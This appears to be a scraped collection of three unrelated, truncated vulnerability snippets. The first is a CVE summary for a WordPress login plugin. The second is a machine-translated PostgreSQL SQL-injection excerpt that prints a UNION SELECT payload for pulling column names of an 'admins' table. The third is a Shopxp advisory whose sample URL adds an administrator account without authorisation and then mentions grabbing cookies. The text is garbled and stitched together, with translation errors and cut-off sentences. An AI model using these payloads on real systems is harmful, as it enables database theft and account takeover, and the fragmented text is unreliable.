CVE-2021-34628

The Admin Custom Login WordPress plugin is vulnerable to Cross-Site Request Forgery due to the loginbgSave action found in the /includes/Login-form-setting/Login-form-background.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.2.7...

Analysis of the postgresql database attack techniques II-vulnerability warning-the black bar safety net

You can see we broke up in a field for the name, then we continue incrementing the offset value, to obtain the other field, as shown in Figure 9 and 1=2 union select 1,columnname,'3','4' from informationschema. the columns where tablename='admins' offset 2 limit 1-- ! Figure 9 Field passowrd is...

Shopxp-v10. 8 5 external submission of data vulnerability-vulnerability warning-the black bar safety net

savexpadmin. asp is not filtered outside the submitted data: http://127.0.0.1/admin/savexpadmin.asp?action=add&admin2=qing&password2=qing520&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1 Increase user: qing password is qing520 user Login background: http://127.0.0.1/upfilepicgetimg.asp Grab the cookies...